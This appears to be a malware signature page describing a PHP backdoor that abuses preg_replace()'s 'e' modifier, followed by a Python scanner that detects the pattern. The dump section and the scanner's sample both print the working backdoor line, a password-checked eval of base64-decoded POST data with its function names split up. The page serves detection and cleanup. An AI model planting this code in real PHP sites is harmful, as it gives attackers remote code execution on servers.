Malware Signatures

php.backdoor.pregreplace.009

Backdoors are pieces of code that allow attackers to bypass authentication, maintain their access to the server and reinfect files. Some of those malicious files can be as simple as a single line of code, allowing the execution of remote code, or complex algorithms, providing different functions to the attacker.

The preg_replace() function is another way to execute code. When it is used with the "e" modifier, the code it processes is also executed, which lets malware authors deobfuscate and run their code in a single step. It is widely used even though the "e" modifier is deprecated.

Affecting

Any site on a server with PHP enabled

Cleanup

You can sign up with us and let our team remove the malware for you.

Dump

if(@md5($_POST['u'.'pw'])=='c89be6715547152166700ff52ba56fb0')
preg_replace("|w|e",'ev'.'al(ba'.'se64'.'_dec'.'ode($_'.'PO'.'ST["c"]));',"w");
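
A static check for this pattern, as an added example that is not part of the original signature page: it folds 'ev'.'al' style string concatenation and reports preg_replace() calls whose literal pattern carries the "e" modifier. The function names, the RISKY token list and the benign sample lines are assumptions made for illustration; the flagged call is the one from the dump above.

```python
import re

STR = r"'(?:\\.|[^'\\])*'" + "|" + r'"(?:\\.|[^"\\])*"'   # PHP quoted literal
LIT_RUN = re.compile(rf"(?:{STR})(?:\s*\.\s*(?:{STR}))*")
CALL = re.compile(rf"preg_replace\s*\(\s*({STR})\s*,\s*({STR})?", re.I)
CLOSERS = {"(": ")", "[": "]", "{": "}", "<": ">"}
RISKY = ("eval", "assert", "base64_decode", "gzinflate", "str_rot13",
         "$_POST", "$_GET", "$_REQUEST", "$_COOKIE")   # assumed hint list

def fold_concat(src):
    """Collapse 'ev'.'al' style runs of same-quote literals into one literal."""
    def join(m):
        parts = re.findall(STR, m.group(0))
        if len(parts) < 2 or len({p[0] for p in parts}) != 1:
            return m.group(0)          # lone literal or mixed quotes: keep as is
        body = "".join(p[1:-1] for p in parts)
        # Re-add newlines swallowed between literals so line numbers stay valid.
        pad = "\n" * (m.group(0).count("\n") - body.count("\n"))
        return parts[0][0] + body + parts[0][0] + pad
    return LIT_RUN.sub(join, src)

def modifiers(pattern_literal):
    """Return the modifier letters that follow the closing regex delimiter."""
    body = pattern_literal[1:-1].lstrip()
    end = body.rfind(CLOSERS.get(body[:1], body[:1]))
    return body[end + 1:] if end > 0 else ""

def scan(src):
    """List preg_replace() calls whose literal pattern carries the e modifier."""
    folded, hits = fold_concat(src), []
    for m in CALL.finditer(folded):
        mods = modifiers(m.group(1))
        if "e" in mods:
            repl = m.group(2) or ""
            hits.append({"line": folded.count("\n", 0, m.start()) + 1,
                         "modifiers": mods, "replacement": repl,
                         "risky": [t for t in RISKY if t in repl]})
    return hits

# Lines 2-3 are constructed benign code; line 4 is the call from this page's dump.
SAMPLE = r"""<?php
$parts = explode('.', $host);
$clean = preg_replace('/\s+/', ' ', $title);
preg_replace("|w|e",'ev'.'al(ba'.'se64'.'_dec'.'ode($_'.'PO'.'ST["c"]));',"w");
"""

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Patterns built from variables, arrays or escape sequences are not resolved by this check and need a separate review.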